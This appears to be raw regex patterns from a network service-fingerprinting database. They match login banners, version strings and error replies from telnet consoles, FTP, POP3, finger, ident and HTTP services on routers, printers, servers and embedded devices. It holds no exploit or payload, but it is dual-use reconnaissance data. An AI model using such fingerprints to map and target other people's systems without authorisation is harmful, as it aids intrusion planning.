([\d.]+) Server ([\w._-]+)\n\r\0\r\0\nMAC address (\w+)\n\r\0Software version V[\d.]+ \(\d+\) ([\w._-]+)\r\0\nPassword : +uShare \(([\w._-]+)\) \(Built .*\)\nFor a list of registered commands type \"help\"\n\n> +SMPlayer ([\w._-]+)\r\nType help for a list of commands\r\n +Sorry, already connected\.\r\n| p|Slirp PPP/SLIP-on-terminal emulator telnetd +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\r\nCopperJet ([\w._-]+) RouterPlus .*\r\nFirmware version: ([\w._ -]+)\r\nAllied Data Technologies\r\n\r\nPlease login: +\xff\xfb\x01\xff\xfb\x03Welcome to the Windows CE Telnet service on MP370\r\n\r\nPocket CMD v ([\w._-]+)\r\n\\> \n\r\n\\> \\> +\xff\xfb\x01\r\n3Com Access Point 7760 login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03 login: +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03PRICOM 3100 Ver ([\w._-]+) TELNET server\.\r\0\nCopyright \(C\) 2002-2004 silex technology, Inc\.\r\0\nlogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\r\n\r\r\nWelcome to Aerohive Wireless Product\r\r\n\r\r\nlogin: +\xff\xfb\x01\xff\xfb\x03\r\nLexmark International Telnet\r\n\r\nlogin: +\xff\xfb\x03\xff\xfb\x01Alcatel-Lucent: A7510\r\nA7510_(R\d+) .*\r\n\r\n\r\nLogin: +\xff\xfd\x18\xff\xfd\x1f\xff\xfd!\xff\xfd\x17\xff\xfb\x01\xff\xfb\x03\xff\xfd \xff\xfd#\r\n\r\n Welcome to OpenVMS \(TM\) VAX Operating System, Version V([\w._-]+) \r\n\r\n\r\0Username: +\xff\xfb\x01\xff\xfb\x03\r\n\r\n>>> System ([\w._-]+) - OpenVMS Alpha V([\w._-]+) <<<\r\n\r\n\rUsername: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nGbE2c L2/L3 Ethernet Blade Switch for HP c-Class BladeSystem\.\r\n\r\nCopyright\(C\)2003 Hewlett-Packard Development Company, L\.P\.\r\n\r\n\r\nEnter tacacs username: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03U\.S\. Robotics ADSL 4-Port Router\r\nLogin: +\xff\xfb\x01\xff\xfb\x03\n\r\0\*\*\* Mitsubishi ProjectorView Server \*\*\*\r\0\nMAC address (\w+)\n\r\0Software version V([\w._-]+) \((\d+)\) MELCO\r\0\n\n\r\0Press Enter for Setup Mode \n\r\0 +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n === IMPORTANT ============================\r\n Use 'passwd' to set your login password\r\n this will disable telnet and enable SSH\r\n ------------------------------------------\r\n\r\n\r\nBusyBox v(.*) built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n ___ ___ ___ \r\n\( _`\\ _ /'___\)'___\) Bifferboard mini-distribution v([\w._-]+)\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03 =======================\r\n DSL-500B \r\n =======================\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nWelcome to Linux \(ZEM500\) for MIPS\r\n\rKernel ([\w._-]+) \w+ on an MIPS\r\n\rZEM500 login: +\xff\xfb\x01\xff\xfe\x01Connected\r\n\n\rAironet BR500E V([\w._-]+) Main Menu +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03TrioLink \(ADSL IAD\)\r\nLogin: +Linux ([\w._-]+) \[INSTALL: [\d-]+\]\nLASTPATCH: [\d:-]+\n +\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\x1b\[0;37;40m\x1b\[2J\x1b\[1;1HLogin Name: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03Xcelerator IP \r\nLogin: +odec=\d+ u=\d+, p=\d+, i=\d+, max entries = \d+ \r\n\d+: IMGREQUEST: request_stats, image buffers available = \d+ \r\n\d+: MAIN: (\d+) images\(J=\d+, P=\d+, I=\d+\) stored on disk in last minute +\r\nSiemens 5940 T1E1 \[COMBO\] Router \([\w._-]+\) v([\w._-]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Username: +\xff\xfb\x01\xff\xfb\x03\r\n\r\nWelcome to Dinion-IP-NWC [\d.]+ from [\d.]+\r\n +\xff\xfb\x03\xff\xfb\x01\xff\xfe\x01\xff\xfd\0\r\nser2net port \d+ device (/dev/[-\w_]+) \[\d+ \w+\] \(Debian GNU/Linux\)\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfe\x01\n\rTerminal shell v1\.0\n\r\rCopyright \xa92008 Motorola, Inc\. All rights reserved\.\n\r\rNetopia Model ([\d-]+)(?: AnnexA)? High-Power Wireless DSL Ethernet Managed Switch\n\rRunning Netopia SOC OS version ([\w.-]+ \(build \w+\))\n +\xff\xfb\x01\xff\xfb\x03ssss ssss sss s ss sss sss sss sssss \r\n s s s s s s s s s s s s s \r\n s s s s s s s s s s s \r\n s s ss s ss ssss s sss s ssss s s sss \r\n s s s s s s s s s s s s s s s \r\n s s s s s s s sss s s s s s s \r\n s s s s s s s s s s s s s s s s s \r\nssss ssss ssssss sss sss sssss ss sssss sss sss sssss\r\nLogin: +\r\nPRO2 Control Console\r\n +\w{12}\r\nETHMAC ([0-9a-f:]+)\r\nWIFIMAC ([0-9a-f:]+)\r\n> +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nWireless AP Manager Console [^\r\n]+\r\n please enter your password: +\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfb\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05Login: +\xff\xfb\x01\xff\xfb\x03\r\n\r\nYou are connected to configuration tool\r\nEnter the password: +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05\r\n\*\*\* Welcome to VTM \*\*\*\r\n\r\n\r\n\rLogin : +\r\nCEN-IDOC Control Console\r\n\r\nCEN-IDOC> +\xff\xfb\x01\r\nWelcome to Ring v([\d.]+) Copyright \(C\) AMX Corp\. 2002-2003\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03TESTING MODEL ADSL Router\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\[([^]]*)\]\[([^]]*)\]\[([^]]*)\]\r\n +\xff\xfe\"\xff\xfb\x01\x1b<\x1b>\x1b\[\?25l\x1b\[0m\x1b\[2J\x1b\(B\x1b\)0\x0f\x1b\[7m\x1b\[f Areca Technology Corporation RAID Controller +\xff\xfb\x01\xff\xfb\x03\r\n\r\n\r\n\r\n\*{76}\r\n\r\n +Minolta Network Configuration Utility\r\n +Minolta\r\n +Version ([\w.]+)\r\n +\xff\xfd\x03\xff\xfe\x01\xff\xfb\x01\s+ZebraNet Internal Wired PS Configuration Utility\r\n\r\n Type your password\. Press Enter when finished\.\r\n\r\n Password: +\xff\xfb\x01\n\rWelcome to TrueTime Network Interface\n\r\rUser name: +MythFrontend Network Control\r\nType 'help' for usage information\r\n---------------------------------\r\n# +\x1b\[0m\r\nWelcome to (IC-\d+)!\r\n\r\n\x1b7\x1b\[\?25l\x1b\[501;501H\x1b\[6n\x1b8\x1b\[\?25h\r\x1b\[0m\x1b\[1mIC-\d+ # \x1b\[0m\x1b\[J\r\x1b\[10C +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\x0c\x1b\[2JEnter Password: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\r\n\rWelcome to DreamBox\.\r\n\rRunning under Kernel ([\w._-]+) \.\r\n\rBased on (Gemini [\w._-]+ GUI)\.\r\n\rKernel and utilities compiled by SatDream\.\r\n\r\r\n\r\r\n\rhttp://www\.satderam\.ru , info@satdream\.ru , dreambox@satdream\.ru\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nBNT Layer 2/3 Copper Gigabit Ethernet Switch Module for IBM BladeCenter\.\r\n\r\n\r\nEnter password: | p|Nortel Layer 2/3 Gigabit Ethernet switch for IBM BladeCenter +\xff\xfb\x01\xff\xfd\"\r\n##### #### ## ## #### #####\r\n## ## ## ## ## # ## ## ## ##\r\n## ## ###### ####### ## #####\r\n## ## ## ####### ## ## ##\r\n## ## ##### ## ## #### ######\r\n A Butter Team Creation\r\n\r\nPassword : +\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfe\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05TiMOS-([\w._-]+) cpm/hops ALCATEL SR (\w+) +\xff\xfb\x01\xff\xfb\x03\r\n\x1b\[1;1H\x1b\[2J\r\n\r\nObeh\xf6riga \xe4ga ej tilltr\xe4de\r\n\r\n\xf6vertr\xe4delse beivras\.\r\n\r\n\rUsername: +\n\rTA-005-FXO1-122M : CLI\n\rLogin : +\xff\xfe\x01\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x18Georgia SoftWorks Telnet Server for Windows NT/2000/XP/2003/Vista/2008 Ver\. ([\w._-]+)\n\rEvaluation copy, \d+ users enabled\. Expiration date is ([\d/]+)\.\n\r\n\rUser \d+ of \d+\n\r\n\rlogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\+{79}\r\n\r\+{33}#############\+{33}\r\n\r\+{28}###### ######\+{28}\r\n\r +\xff\xfb\x01\xff\xfb\x03BR-telnet@(FES\w+) Router> +\xff\xfb\x01\xff\xfb\x03\r\n\r\nCopyright \(c\) 2005 - 2008 Enterasys, Inc\. All rights reserved\.\r\n\n\r\n\r\n\r\0Username: +\r={74}\n\rTransition Networks Telnet Server\n\rSystem name: SMKG-PKGEAST-([\w._-]+)\n\rPress CTRL-D to disconnect\.\n\rEnter password: +\xff\xfb\x03\xff\xfb\x01\r\n \*{73}\r\n This is a private system\. \r\n Do not attempt to login unless you are an authorized user\. \r\n Any authorized or unauthorized access or use may be monitored and can\r\n result in criminal or civil prosecution under applicable law\.\r\n \*{73}\r\n\r\nMP login: +\xff\xfe\"\xff\xfb\x01\x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[5B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[6B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[7B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9B\x1b\[2B Verify Password \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9B\x1b\[4B \x0e\x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[8C\x1b\[9B\x1b\[1Blqqqqqqqqqqqqqqqqqqqk\x1b +Sorry, new remote sessions are disallowed by current switch configuration\. +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\x1b\[H\x1b\[J\r\nWireless Router Manager Console , Version : ([\w._-]+)\r\nPlease enter your password : +\xff\xfb\x01\xff\xfb\x03\*{60}\r\n\* WARNING ALERT: AUTHORIZED USERS ONLY! +\*\r\n\* +\*\r\n\* All activities conducted on this system may be monitored \*\r\n\* and recorded\. If you are not an authorized user, log off \*\r\n\* immediately\. Illegal entry, misuse, and / or criminal \*\r\n\* activity will be documented and prosecuted to the full \*\r\n\* extend of the law\. +\*\r\n\*{60}\r\n\r\n\r\nPress to accept and continue the login process\.\.\.\.\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\x1b\[2J\x1b\[1;1H\x1b\[1mwb-adtran-\w+ ADTRAN (TDU-\w+)\x1b\[0m\x1b\[2;1HConnecting\.\.\.\. +\r\n%connection closed by remote host!\0 +Sorry, telnet is not allowed on this port! +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nBUFFALO INC\. LinkStation series HS-DHGL\(JINMU\)\r\n\rFENCHURCH login: +\nFelix Remote Shell Console:\r\n============================\r\n\r\n-> +\r\n\r\nBackup Server Telnet Session\r\n\r\nUser: +\xff\xfb\x01\xff\xfd\"\[game001\] remote control session\.\r\nPassword:\0 +\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[3;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HProCurve J\w+ Switch ([\w-]+)\r\n\rSoftware revision ([\w._-]+)\r\n +\xff\xfb\x01\r\nNetDVRDVS: +nodnsquery/[\d.]+ is not authorized to use the telnet proxy\r\n +\xff\xfc\x01\xff\xfd\"ixProxy V([\d.]+), Copyright \(C\) \d+ Ixia Communications\r\nEnter target port ip address as login name \(example: 10\.0\.1\.1\)\r\nlogin: +\0\0\0H\0\0\0\x02\x0fTimeEdit131\. +0301&<\x16\0\x84\xc7\x02\xe0\xe1\xb1\x008\x13\x1e\x0b\x80<\x16\0\xc7\t\x8f\x05\xc0\xf0X\0\x1c\xc2c\x01p\x1e\x0b\x80\xe3c\x01p\xdcX\0\x1c7\x8f\x05\xc0q\x0b\x80\xe3F\xc7\x02\xe0\xb8,\0\x8e\x1b\xb1\x008n\x05\xc0q\xa3\x008n\xb4\x02\xe0\xb8\xd1\x01p\xdch\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x12\0\x03\0\x04\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x12\0\r\0\x03\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x9a\x20\xd0Z\x1e\x1b\xa3\*\xf2\xdd\xe2\(\xc3sp&\xda\xe4Yp\xdbET\xf9\x8cc\xc24\*Y\xbe\xb3\xba\xd6%\xf5\xb668\xad\xab>@D<\x01\xdd>\)\xdb\x18\xf55\xd1\xba\x96\x1c\x17\x17\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\x01 +\x0f\0\n\0\x01\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x0b\0\0\0GBXRemote 2 +VTUN server ver \. (\d[-.\w /]+)\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +VTUN server ver \(.*\) (\d[-.\w /]+)\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +250 OK moleSoftware VHCS2 Server Welcomes You !\r\n +TrueWeather\r\n\r\n> +\x96\xfeS\xab +\+ read portFile\n\+ head -1\n\+ find /var/websm/ +([-\w_.]+) xine-ui ([\d.]+) remote server\. Nice to meet you\.\n +Vty password is not set\.\r\n +\r\nUser Access Verification\r\n\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfe\"\xff\xfd\x1fPassword: +bp[-\w]+: error while loading shared libraries: libstdc\+\+-libc6\.2-2\.so\.3: cannot open shared object file: No such file or directory\n +\0\x0e@........\0\0\0\0\0 +\0\*@.*\0\0\0\0\0 +\0<\xaa\xc5\r\^\xf7\x1b\xd1\xe1a/\xe8\x17P\x9dOb\xbb\x93\x87\xe0\xf3v\x81K\xa4!\xe6\xc7\x01\x977u5A\xd1M\x1b;\xc7\xcb\x87\xb5\x87\xf3~\xc8w\xef\xd3\x87eA\0\^\xbf\xc5\x93i\xf6\x87 +\xa5A\0\x01\0\0\0,\0\0\0\x02\0\0\0L\0\0\0\x08Connect\0\0\0\0x\0\0\0\x0857222\0\0\0 +.\x01.[\x02\x03]\x01\d+\0 +OK0100 eXtremail V([\d.]+) release (\d+) REMote management \.\.\.\r\n +SuSE Meta pppd \(smpppd\), Version ([\d.]+)\r\n +\x7e\xff\x7d\x23\xc0\x21}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6\x7d\x27\x7d\x22\x7d\x28\x7d\x22\xc7\x7d\x23\x7e +\x7e\xff\x7d\x23\xc0\x21}!}!} }4}\"}&} } } } }%}&\x81\xf4\xdb\xc0}'}\"}\(}\"\xc4\x80~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\x81\xf4\xdb\xc0}'}\"}\(}\"\xc4\x80\x7e +-=QDS Task Refactoring Dev v([\w._-]+) Debug Tracing LiveView=-\r\nType quit or \^X to close connection\.\r\n\r\n +503 Service Unavailable\r\n\r\n\0 +Microsoft Windows XP \[Version [\d.]+\]\n\(C\) Copyright 1985-\d+ Microsoft Corp\.\n\nC:\\> +HELLO Welcome to Tunnel Vision \(([\d.]+)\)\n +\0\0\0\x04Z(\d)([1-9]\d) +Invalid request string: Request string is: \"\r\" +Feedback\nError=You need unique ID to command ABC! +#connected,all connect count: 1{\"event\":\"device_status\",\"data\":{\"wifi_name\":\"([^\"]+)\",\"wifi_signal\":\d+,\"battery\":\d+,\"batterycharging\":\w+,\"gsm_signal\":\d+,\"sms_unread\":\d+,\"sdcard\":\d+,\"updateinfo\":null}} +-\0\0\0\0| p|IBM OS/400 as-servermapd| o|OS/400 +\x99\xf3\0\0\0\0\0\0\xff\xff\xff\xff +\0\0\0\0\0\0\0\x08 +\[AUTHPOINT RESPONSE\]\r\nreturn_code=AUTHPOINT ERROR\r\nreturn_code_text=Error response parsed by base message object: Invalid or missing register #\r\nresponse=\r\nidentifier=\r\napproval_code=\r\n +Unknown command\r\n +Can't fork pty, bye!\n +Message received\n +Use of uninitialized value in transliteration \(tr///\) at /var/jchkmail/user-filter +Connection from \[[\d.]+\]\r\n\r\nEnter your account name and password\.\r\nSorry, there is no guest account\.\r\n\r\nUsername: +\r\nEnter your account name and password\.\r\n\r\nUsername: +\n\x03 +unrecognized op\n\x03 +\nunrecognized op\n\n\x03 +\n(\d+)\n(\d+)\n(\d+) +\xc0\0\x01\0....\0\0\0\x03 +200-At least a module and a command must be specified\r\n200-At least a module and a command must be specified\r\n +\nWelcome to the Computone IntelliServer `([\w._-]+)'\nRunning cnx kernel release ([\w._, -]+)\n\npt-ses day time owner command\n +Idle\r\n +UNKNOWN COMMAND\n +_err=refused%20by%20workers\r\n +ok\r\nunknown command\r\nunknown command\r\n +Expecting SSL \(optional\) and CONFIG as first commands\.\n +X01\r\nX01\r\n +Invalid FT GWADDR / START protocol\n +\x03Not a valid name\. This may because you left it blank or used invalid symbols\. Please try again\.\n +Finger online user list request denied\.\r\n +Username Real name Idletime TTY Remote console location\n +Login Name Tty Idle Login Time Office Office Phone\r\n +\r\nIntegrated port\r\nPrinter Type: Dell Laser Printer ([-\w+.]+)\r\nPrint Job Status: (.*)\r\n +This is ([-\w_.]+) finger server\.\r\n\r\nPlease use username@domain format\.\r\n +\r\nIntegrated port\r\nPrinter Type: Lexmark ([^\r\n]+)\r\n +finger: /var/adm/lastlog open error\nNo one logged on\r\n +Debian GNU/Linux Copyright \(C\) 1993-1999 Software in the Public Interest\n.*You haven't specified a user\.\n\n A general listing is not provided to the public\. +\r\nPrinter Type: Lexmark Optra LaserPrinter\r\n +MSS485 Version V([\w._/-]+)\(([\w._-]+)\) - Time Since Boot: +220 Welcome to Stupid-FTPd server\.\r\n422 Too busy to play with you\.\r\n +520 invalid command\n +\xea\xdd\xbe\xef\0\0\0\x05\0\0\x000\0\0\x000\0\0..\0\0\0\x08\0a\0f\0f\0s\0p\0r\0n\0g\0\0\0\0\0\0\0\0 +220 Inactivity timer = \d+ seconds\. Use 'site idle ' to change\.\r\n221 Goodbye \(badly formated command seen\)\. You uploaded 0 and downloaded 0 kbytes\.\r\n221 Goodbye \(badly formated command seen\)\. You uploaded 0 and downloaded 0 kbytes\.\r\n +220 \r\n500 Unknown command: \"\"\r\n500 Unknown command: \"\"\r\n +220 ([-.\w]+) FTP Server ready \.\.\.\r\n530 \r : User not logged in\. Please login with USER and PASS first\.\r\n530 \r : User not logged in\. Please login with USER and PASS first\.\r\n +220 \"Welcome to Bot FTP service\.\"\r\n331 Please specify the password\.\r\n230 Login successful\. Have fun\.\r\n +220 OK\n226 OK\n +220 Welcome to pyftpd\. Happy downloading\.\r\n500 I'm gonna ignore this command\.\.\. maybe later\.\.\.\r\n +220 ([\w._-]+) server ready\.\r\n502 command not implemented\.\r\n502 command not implemented\.\r\n +220 UnleashX FTP ready\.\r\n503 Login with USER first\.\r\n +220 ps2ftpd ready\.\r\n500 Not understood\.\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfc\"\r\n\r\n\n\rauthentication failed!\n\rpassword: +\xff\xfc\"\xff\xfb\x01\r\nPassword: \r\nbad password\r\n| p|Campbell Scientific NL-100/105 Ethernet-to-serial bridge telnetd +FlashCONNECT ([\d.]+) invalid message\.\n +\\0\0\0\xd4\x17\0\0\x01\0\0\0\x05\0\0\0\x01\0\0\0\x05\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\nBad connect string! +{type INIT} {up \d+} {auth \d+} {name {([^}]+)}} {ip [\d.]+} {max \d+} {port (\d+)}\r\n +\xf2\xfa\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\0\0\0\0\0\0\0\0 +HTTP/1\.1 501 Not Implemented\r\nCache-Control: no-cache, must-revalidate, max-age=0\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: \d+\r\nConnection: close\r\n\r\n

Not Implemented

Whatever the heck you just requested, I can't generate\. +HTTP/1\.0 501 Document Follows\r\nContent-Type: text/html\r\nContent-Length: 106\r\n\r\n501 Method Not Implemented\r\n

501 Method Not Implemented

\r\n +HTTP/1\.0 400 Bad Request\r\n.*Server: PeopleSoft PSRENSRV/([\w._-]+)\r\n.*PeopleSoft PSRENSRV/[\w._-]+ on http://([\w._-]+):\d+ +<\?xml version=\"1\.0\" encoding=\"UTF-8\"\?>\n\n\t\n\t\t([\w._-]+)\n\t\t[\d.]+\n\t\n\t\n\t\t\n\t\t\tNo destination specified\n\t\t\n\t\n\n\n +0, 0: ERROR: UNKNOWN-ERROR\n +0 , 0 : ERROR : UNKNOWN-ERROR\r\n +0 , 0 : ERROR : INVALID-PORT\r\n + : ERROR : UNKNOWN-ERROR\r\n +0, 0 : ERROR : X-INVALID-REQUEST\r\n +0 , 0 : ERROR : INVALID-PORT\r\n0 , 0 : ERROR : INVALID-PORT\r\n +0, 0 : ERROR : INVALID-PORT\r\n +0,0 : ERROR : INVALID-PORT\r\n +0 , 0 : ERROR :INVALID-PORT\r\n + : USERID : UNIX : ([-\w_]+) + : USERID : UNIX : [a-z]{4,8}\r\n +1 , 1 : USERID : OTHER : chuck-the-bsd-deamon\r\n +, : USERID : UNIX : [^\r\n]+\r\n +\* OK IMAP4 1\.0 server ready\r\n\* BAD Argument\r\n +ERR password required\r\nERR password required\r\n +ERR administrator password required\r\nERR administrator password required\r\n + \r\nSorry, that nickname format is invalid\.\r\r\n +:([-\w_.]+) 421 \r\n\r\n :\r\n\r\n unimplemented protocol request\r\n:[-\w_.]+ 421 \r\n\r\n :\r\n\r\n unimplemented protocol request\r\n +\+OK \r\n-ERR XXX authorization first\r\n +HLO 0 0 \. 0 71\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\nLRNP/1\.1\r\n\r\nlistener\r\nEND\r\nERR 0 1 \. 71 80\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\n451 0 Invalid message \(-2001\)\r\nEND\r\nMSG 0 2 \. 151 58\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\nCLOSE 0\r\nEND\r\n +ERROR: Command doesn't seem to be followed by a space followed by arguments\n +.\x08\0\0 +500 access denied: Check networking/linuxconf network access\r\n +BEGIN\n\r\nERROR\nDATA\n1\nbad send packet\nEND\nBEGIN\n\r\nERROR\nDATA\n1\nbad send packet\nEND\n +\x02\x02 +ERROR\r\nERROR\r\n +\x82\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +ERROR: Unknown request number\. +ERROR: Invalid password\.\nERROR: Invalid password\.\n +HP OpenView OmniBack II ([-.\w]+): INET, +\0\0\xfa\xda\0\x02 +598::Command not recognized\.\r\n598::Command not recognized\.\r\n| p|Mercury/32 PH addressbook server +\+OK POP3 ([-.+\w]+) v(\d[-.\w]+) server ready\r\n +\+OK POP3 \[([-.+\w]+)\] (\d[-.\w]+) server ready\r\n +\+OK POP3 \[([-.\w]+)\] v(200[-.\w]+) server ready\r\n-ERR Null command\r\n-ERR Null command\r\n +\+OK POP3 server ready\r\n-ERR invalid command\r\n| p/IBM OS 400 pop3d/ o|OS/400 +\+OK pop server ready\r\n +\+OK ([\w._-]+)\r\n-ERR Invalid command in current state\.\r\n-ERR Invalid command in current state\.\r\n +-ERR Invalid command\.\r\n-ERR Invalid command\.\r\n +\+OK POP3 ready\r\n-ERR invalid command\r\n +\+OK POP3 Ready ([-\w_.]+) \w+\r\n-ERR Null command, mate\r\n +\+OK POP3Proxy ready\r\n-ERR Unknown command\r\n-ERR Unknown command\r\n +EInvalid packet length\0 +EFATAL 1: invalid length of startup packet\n\0 +\xff +\xc0\0\x12Data field missing +\xff\x17Access to unopened port. +Status: 400 Bad Request\r\nContent-Length: 0\r\n\r\n +\xa8\x08C\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +ERR 27 +\xf1\xf8\xf2\xf6\xf3\xf3\xf0\xf0\xf3\xf8\xf7\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xe2\xf6\xf5\xf6\xf9\xc5\xf9\xc3\0\xf0\xf0\xf3\xf1\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0 +\x05\x01\0.\0\0\0\0\0\0 +\x02\0\x01\xfb\xff\xfb\xff\xff\xff\xff\xffNOSUP +SPAMD/1\.0 76 Bad header line: \r\n +ERHD +\x01\0\0\0 +SSTP/([\d.]+) 400 Bad Request\r\n\r\n\0 +\x01\0\0\0z\0\0\x003,DBServer,\d+,Restarts,\d+,\d+,UpTime,\d+,\d+,MediaServer +\xff\xfb\x03\xff\xfb\x01 +\xff\xfb\x01\xff\xfb\x03\r\nUser:\r\n\r\nUser:\r\n\r\nUser: +514 Authentication required\.\r\n +login: Password: Login incorrect\. +login: uucpd: 